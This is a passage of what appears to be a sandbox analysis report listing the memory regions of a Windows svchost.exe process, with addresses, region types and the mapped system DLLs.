name = "private_0x0000000002430000"
filename = ""
Region:
id = 1286
start_va = 0x24b0000
end_va = 0x252ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024b0000"
filename = ""
Region:
id = 1287
start_va = 0x2610000
end_va = 0x268ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 1288
start_va = 0x26a0000
end_va = 0x271ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000026a0000"
filename = ""
Region:
id = 1289
start_va = 0x27a0000
end_va = 0x281ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000027a0000"
filename = ""
Region:
id = 1290
start_va = 0x2830000
end_va = 0x28affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 1291
start_va = 0x2960000
end_va = 0x29dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002960000"
filename = ""
Region:
id = 1292
start_va = 0x2b50000
end_va = 0x2bcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b50000"
filename = ""
Region:
id = 1293
start_va = 0x2ce0000
end_va = 0x2d9ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 1294
start_va = 0x2db0000
end_va = 0x2e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002db0000"
filename = ""
Region:
id = 1295
start_va = 0x2e40000
end_va = 0x2ebffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002e40000"
filename = ""
Region:
id = 1296
start_va = 0x2ec0000
end_va = 0x2f3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002ec0000"
filename = ""
Region:
id = 1297
start_va = 0x2f40000
end_va = 0x2fbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002f40000"
filename = ""
Region:
id = 1298
start_va = 0x2fc0000
end_va = 0x30bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002fc0000"
filename = ""
Region:
id = 1299
start_va = 0x30c0000
end_va = 0x32bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000030c0000"
filename = ""
Region:
id = 1300
start_va = 0x33b0000
end_va = 0x342ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000033b0000"
filename = ""
Region:
id = 1301
start_va = 0x3480000
end_va = 0x34fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003480000"
filename = ""
Region:
id = 1302
start_va = 0x3560000
end_va = 0x35dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003560000"
filename = ""
Region:
id = 1303
start_va = 0x3830000
end_va = 0x38affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003830000"
filename = ""
Region:
id = 1304
start_va = 0x39d0000
end_va = 0x3dcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000039d0000"
filename = ""
Region:
id = 1305
start_va = 0x3e70000
end_va = 0x3eeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003e70000"
filename = ""
Region:
id = 1306
start_va = 0x3f60000
end_va = 0x3fdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003f60000"
filename = ""
Region:
id = 1307
start_va = 0x4100000
end_va = 0x42fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004100000"
filename = ""
Region:
id = 1308
start_va = 0x4300000
end_va = 0x4afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004300000"
filename = ""
Region:
id = 1309
start_va = 0x4b00000
end_va = 0x4efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004b00000"
filename = ""
Region:
id = 1310
start_va = 0x4f00000
end_va = 0x4ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004f00000"
filename = ""
Region:
id = 1311
start_va = 0x5140000
end_va = 0x514ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005140000"
filename = ""
Region:
id = 1312
start_va = 0x67c0000
end_va = 0x683ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000067c0000"
filename = ""
Region:
id = 1313
start_va = 0x6f70000
end_va = 0x6feffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006f70000"
filename = ""
Region:
id = 1314
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1315
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1316
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1317
start_va = 0x77a50000
end_va = 0x77a56fff
monitored = 0
entry_point = 0x77a5106c
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 1318
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1319
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1320
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1321
start_va = 0xff950000
end_va = 0xff95afff
monitored = 0
entry_point = 0xff95246c
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 1322
start_va = 0x7fef35a0000
end_va = 0x7fef35aefff
monitored = 0
entry_point = 0x7fef35a9a48
region_type = mapped_file
name = "mspatcha.dll"
filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll")
Region:
id = 1323
start_va = 0x7fef35b0000
end_va = 0x7fef3802fff
monitored = 0
entry_point = 0x7fef35b236c
region_type = mapped_file
name = "wuaueng.dll"
filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll")
Region:
id = 1324
start_va = 0x7fef3b60000
end_va = 0x7fef3b7afff
monitored = 0
entry_point = 0x7fef3b61198
region_type = mapped_file
name = "cabinet.dll"
filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll")
Region:
id = 1325
start_va = 0x7fef4740000
end_va = 0x7fef4811fff
monitored = 0
entry_point = 0x7fef47d1a10
region_type = mapped_file
name = "qmgr.dll"
filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll")
Region:
id = 1326
start_va = 0x7fef48b0000
end_va = 0x7fef48c1fff
monitored = 0
entry_point = 0x7fef48b90bc
region_type = mapped_file
name = "bitsigd.dll"
filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll")
Region:
id = 1327
start_va = 0x7fef6550000
end_va = 0x7fef65b1fff
monitored = 0
entry_point = 0x7fef6551198
region_type = mapped_file
name = "rasapi32.dll"
filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll")
Region:
id = 1328
start_va = 0x7fef6c10000
end_va = 0x7fef6c2bfff
monitored = 0
entry_point = 0x7fef6c111a0
region_type = mapped_file
name = "rasman.dll"
filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll")
Region:
id = 1329
start_va = 0x7fef6d30000
end_va = 0x7fef6fa9fff
monitored = 0
entry_point = 0x7fef6d62200
region_type = mapped_file
name = "esent.dll"
filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll")
Region:
id = 1330
start_va = 0x7fef72a0000
end_va = 0x7fef72bcfff
monitored = 0
entry_point = 0x7fef72a2f18
region_type = mapped_file
name = "mmcss.dll"
filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll")
Region:
id = 1331
start_va = 0x7fef93f0000
end_va = 0x7fef946bfff
monitored = 0
entry_point = 0x7fef93f11d4
region_type = mapped_file
name = "wer.dll"
filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll")
Region:
id = 1332
start_va = 0x7fef9550000
end_va = 0x7fef9559fff
monitored = 0
entry_point = 0x7fef9553994
region_type = mapped_file
name = "bitsperf.dll"
filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll")
Region:
id = 1333
start_va = 0x7fef9560000
end_va = 0x7fef9576fff
monitored = 0
entry_point = 0x7fef9569d50
region_type = mapped_file
name = "ncprov.dll"
filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll")
Region:
id = 1334
start_va = 0x7fef9580000
end_va = 0x7fef958bfff
monitored = 0
entry_point = 0x7fef958602c
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 1335
start_va = 0x7fef9590000
end_va = 0x7fef9603fff
monitored = 0
entry_point = 0x7fef95966f0
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 1336
start_va = 0x7fef9610000
end_va = 0x7fef9680fff
monitored = 0
entry_point = 0x7fef96551d0
region_type = mapped_file
name = "wbemess.dll"
filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll")
Region:
id = 1337
start_va = 0x7fef9690000
end_va = 0x7fef96a1fff
monitored = 0
entry_point = 0x7fef96989d0
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 1338
start_va = 0x7fef96b0000
end_va = 0x7fef9764fff
monitored = 0
entry_point = 0x7fef972cf80
region_type = mapped_file
name = "wmiprvsd.dll"
filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll")
Region:
id = 1339
start_va = 0x7fef9770000
end_va = 0x7fef97c9fff
monitored = 0
entry_point = 0x7fef97adde0
region_type = mapped_file
name = "repdrvfs.dll"
filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll")
Region:
id = 1340
start_va = 0x7fef97d0000
end_va = 0x7fef97f0fff
monitored = 0
entry_point = 0x7fef97e03b0
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 1341
start_va = 0x7fef9870000
end_va = 0x7fef9888fff
monitored = 0
entry_point = 0x7fef9871104
region_type = mapped_file
name = "resutils.dll"
filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll")
Region:
id = 1342
start_va = 0x7fef9890000
end_va = 0x7fef98dffff
monitored = 0
entry_point = 0x7fef9891190
region_type = mapped_file
name = "clusapi.dll"
filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll")
Region:
id = 1343
start_va = 0x7fef98e0000
end_va = 0x7fef98e7fff
monitored = 0
entry_point = 0x7fef98e1020
region_type = mapped_file
name = "sscore.dll"
filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll")
Region:
id = 1344
start_va = 0x7fef98f0000
end_va = 0x7fef9902fff
monitored = 0
entry_point = 0x7fef98f1d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 1345
start_va = 0x7fef9910000
end_va = 0x7fef9971fff
monitored = 0
entry_point = 0x7fef994bd80
region_type = mapped_file
name = "esscli.dll"
filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll")
Region:
id = 1346
start_va = 0x7fef9980000
end_va = 0x7fef9aabfff
monitored = 0
entry_point = 0x7fef9a30ef0
region_type = mapped_file
name = "wbemcore.dll"
filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll")
Region:
id = 1347
start_va = 0x7fef9ab0000
end_va = 0x7fef9ac9fff
monitored = 0
entry_point = 0x7fef9ac3fbc
region_type = mapped_file
name = "nci.dll"
filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll")
Region:
id = 1348
start_va = 0x7fef9b60000
end_va = 0x7fef9b84fff
monitored = 0
entry_point = 0x7fef9b78c54
region_type = mapped_file
name = "browser.dll"
filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll")
Region:
id = 1349
start_va = 0x7fef9b90000
end_va = 0x7fef9bccfff
monitored = 0
entry_point = 0x7fef9b91070
region_type = mapped_file
name = "srvsvc.dll"
filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll")
Region:
id = 1350
start_va = 0x7fef9be0000
end_va = 0x7fef9c06fff
monitored = 0
entry_point = 0x7fef9be11a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 1351
start_va = 0x7fef9c10000
end_va = 0x7fef9ce2fff
monitored = 0
entry_point = 0x7fef9c88b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 1352
start_va = 0x7fef9d30000
end_va = 0x7fef9d76fff
monitored = 0
entry_point = 0x7fef9d31040
region_type = mapped_file
name = "wdscore.dll"
filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll")
Region:
id = 1353
start_va = 0x7fef9d80000
end_va = 0x7fef9dc1fff
monitored = 0
entry_point = 0x7fef9d817e4
region_type = mapped_file
name = "sqmapi.dll"
filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll")
Region:
id = 1354
start_va = 0x7fef9dd0000
end_va = 0x7fef9e61fff
monitored = 0
entry_point = 0x7fef9e451ec
region_type = mapped_file
name = "iphlpsvc.dll"
filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll")
Region:
id = 1355
start_va = 0x7fef9e70000
end_va = 0x7fef9ee6fff
monitored = 0
entry_point = 0x7fef9eae7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 1356
start_va = 0x7fef9ef0000
end_va = 0x7fef9f29fff
monitored = 0
entry_point = 0x7fef9f0d020
region_type = mapped_file
name = "wmisvc.dll"
filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll")
Region:
id = 1357
start_va = 0x7fefa220000
end_va = 0x7fefa283fff
monitored = 0
entry_point = 0x7fefa221254
region_type = mapped_file
name = "webio.dll"
filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")
Region:
id = 1358
start_va = 0x7fefa290000
end_va = 0x7fefa300fff
monitored = 0
entry_point = 0x7fefa291010
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 1359
start_va = 0x7fefa3d0000
end_va = 0x7fefa3e6fff
monitored = 0
entry_point = 0x7fefa3d1060
region_type = mapped_file
name = "vsstrace.dll"
filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll")
Region:
id = 1360
start_va = 0x7fefa3f0000
end_va = 0x7fefa59ffff
monitored = 0
entry_point = 0x7fefa3f1010
region_type = mapped_file
name = "vssapi.dll"
filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll")
Region:
id = 1361
start_va = 0x7fefa770000
end_va = 0x7fefa777fff
monitored = 0
entry_point = 0x7fefa771414
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 1362
start_va = 0x7fefa9b0000
end_va = 0x7fefaa26fff
monitored = 0
entry_point = 0x7fefa9bafd0
region_type = mapped_file
name = "taskcomp.dll"
filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll")
Region:
id = 1363
start_va = 0x7fefaa30000
end_va = 0x7fefaa39fff
monitored = 0
entry_point = 0x7fefaa3260c
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")
Region:
id = 1364
start_va = 0x7fefaa40000
end_va = 0x7fefab51fff
monitored = 0
entry_point = 0x7fefaa5f354
region_type = mapped_file
name = "schedsvc.dll"
filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll")
Region:
id = 1365
start_va = 0x7fefab60000
end_va = 0x7fefab6efff
monitored = 0
entry_point = 0x7fefab67e80
region_type = mapped_file
name = "wiarpc.dll"
filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll")
Region:
id = 1366
start_va = 0x7fefab70000
end_va = 0x7fefab78fff
monitored = 0
entry_point = 0x7fefab73668
region_type = mapped_file
name = "fvecerts.dll"
filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll")
Region:
id = 1367
start_va = 0x7fefab80000
end_va = 0x7fefab88fff
monitored = 0
entry_point = 0x7fefab81020
region_type = mapped_file
name = "tbs.dll"
filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll")
Region:
id = 1368
start_va = 0x7fefab90000
end_va = 0x7fefabe5fff
monitored = 0
entry_point = 0x7fefab91040
region_type = mapped_file
name = "fveapi.dll"
filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll")
Region:
id = 1369
start_va = 0x7fefabf0000
end_va = 0x7fefac4dfff
monitored = 0
entry_point = 0x7fefabf9024
region_type = mapped_file
name = "shsvcs.dll"
filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll")
Region:
id = 1370
start_va = 0x7fefac50000
end_va = 0x7fefac67fff
monitored = 0
entry_point = 0x7fefac51bf8
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 1371
start_va = 0x7fefac70000
end_va = 0x7fefac80fff
monitored = 0
entry_point = 0x7fefac716ac
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 1372
start_va = 0x7fefaca0000
end_va = 0x7fefacf2fff
monitored = 0
entry_point = 0x7fefaca2b98
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 1373
start_va = 0x7fefb280000
end_va = 0x7fefb288fff
monitored = 0
entry_point = 0x7fefb2811a0
region_type = mapped_file
name = "tschannel.dll"
filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll")
Region:
id = 1374
start_va = 0x7fefb290000
end_va = 0x7fefb2a3fff
monitored = 0
entry_point = 0x7fefb293e64
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 1375
start_va = 0x7fefb2b0000
end_va = 0x7fefb2bafff
monitored = 0
entry_point = 0x7fefb2b1198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 1376
start_va = 0x7fefb2c0000
end_va = 0x7fefb2e6fff
monitored = 0
entry_point = 0x7fefb2c98bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 1377
start_va = 0x7fefb2f0000
end_va = 0x7fefb356fff
monitored = 0
entry_point = 0x7fefb306060
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 1378
start_va = 0x7fefb370000
end_va = 0x7fefb37afff
monitored = 0
entry_point = 0x7fefb374f8c
region_type = mapped_file
name = "slc.dll"
filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")
Region:
id = 1379
start_va = 0x7fefb380000
end_va = 0x7fefb38bfff
monitored = 0
entry_point = 0x7fefb3815d8
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 1380
start_va = 0x7fefb390000
end_va = 0x7fefb39ffff
monitored = 0
entry_point = 0x7fefb39835c
region_type = mapped_file
name = "themeservice.dll"
filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll")
Region:
id = 1381
start_va = 0x7fefb3a0000
end_va = 0x7fefb3b8fff
monitored = 0
entry_point = 0x7fefb3a11a8
region_type = mapped_file
name = "atl.dll"
filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll")
Region:
id = 1382
start_va = 0x7fefb3c0000
end_va = 0x7fefb3f6fff
monitored = 0
entry_point = 0x7fefb3c8424
region_type = mapped_file
name = "profsvc.dll"
filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll")
Region:
id = 1383
start_va = 0x7fefb440000
end_va = 0x7fefb454fff
monitored = 0
entry_point = 0x7fefb4460d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 1384
start_va = 0x7fefb460000
end_va = 0x7fefb521fff
monitored = 0
entry_point = 0x7fefb46101c
region_type = mapped_file
name = "gpsvc.dll"
filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")
Region:
id = 1385
start_va = 0x7fefb760000
end_va = 0x7fefb768fff
monitored = 0
entry_point = 0x7fefb761010
region_type = mapped_file
name = "avrt.dll"
filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll")
Region:
id = 1386
start_va = 0x7fefb850000
end_va = 0x7fefb87cfff
monitored = 0
entry_point = 0x7fefb851010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 1387
start_va = 0x7fefb880000
end_va = 0x7fefb890fff
monitored = 0
entry_point = 0x7fefb8814c0
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 1388
start_va = 0x7fefb8e0000
end_va = 0x7fefb950fff
monitored = 0
entry_point = 0x7fefb91ecc4
region_type = mapped_file
name = "winspool.drv"
filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv")
Region:
id = 1389
start_va = 0x7fefb9d0000
end_va = 0x7fefb9e3fff
monitored = 0
entry_point = 0x7fefb9d16b4
region_type = mapped_file
name = "samcli.dll"
filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")
Region:
id = 1390
start_va = 0x7fefb9f0000
end_va = 0x7fefba04fff
monitored = 0
entry_point = 0x7fefb9f1050
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 1391
start_va = 0x7fefba10000
end_va = 0x7fefba1bfff
monitored = 0
entry_point = 0x7fefba118a4
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 1392
start_va = 0x7fefba20000
end_va = 0x7fefba35fff
monitored = 0
entry_point = 0x7fefba211a0
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 1393
start_va = 0x7fefbb50000
end_va = 0x7fefbb60fff
monitored = 0
entry_point = 0x7fefbb51070
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 1394
start_va = 0x7fefbcb0000
end_va = 0x7fefbce4fff
monitored = 0
entry_point = 0x7fefbcb1064
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 1395
start_va = 0x7fefc120000
end_va = 0x7fefc175fff
monitored = 0
entry_point = 0x7fefc12bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1396
start_va = 0x7fefc180000
end_va = 0x7fefc2abfff
monitored = 0
entry_point = 0x7fefc1894bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 1397
start_va = 0x7fefc2b0000
end_va = 0x7fefc2ccfff
monitored = 0
entry_point = 0x7fefc2b1ef4
region_type = mapped_file
name = "samlib.dll"
filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll")
Region:
id = 1398
start_va = 0x7fefc300000
end_va = 0x7fefc4f3fff
monitored = 0
entry_point = 0x7fefc48c924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 1399
start_va = 0x7fefc990000
end_va = 0x7fefc99bfff
monitored = 0
entry_point = 0x7fefc991064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1400
start_va = 0x7fefc9a0000
end_va = 0x7fefca5afff
monitored = 0
entry_point = 0x7fefc9a6de0
region_type = mapped_file
name = "firewallapi.dll"
filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")
Region:
id = 1401
start_va = 0x7fefca60000
end_va = 0x7fefca66fff
monitored = 0
entry_point = 0x7fefca614b0
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 1402
start_va = 0x7fefcb50000
end_va = 0x7fefcb6afff
monitored = 0
entry_point = 0x7fefcb52068
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 1403
start_va = 0x7fefcb70000
end_va = 0x7fefcb8dfff
monitored = 0
entry_point = 0x7fefcb713b8
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 1404
start_va = 0x7fefcb90000
end_va = 0x7fefcba1fff
monitored = 0
entry_point = 0x7fefcb91060
region_type = mapped_file
name = "devrtl.dll"
filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll")
Region:
id = 1405
start_va = 0x7fefcbb0000
end_va = 0x7fefcbcefff
monitored = 0
entry_point = 0x7fefcbb5c68
region_type = mapped_file
name = "spinf.dll"
filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll")
Region:
id = 1406
start_va = 0x7fefcc80000
end_va = 0x7fefccb8fff
monitored = 0
entry_point = 0x7fefcc8c0f0
region_type = mapped_file
name = "ubpm.dll"
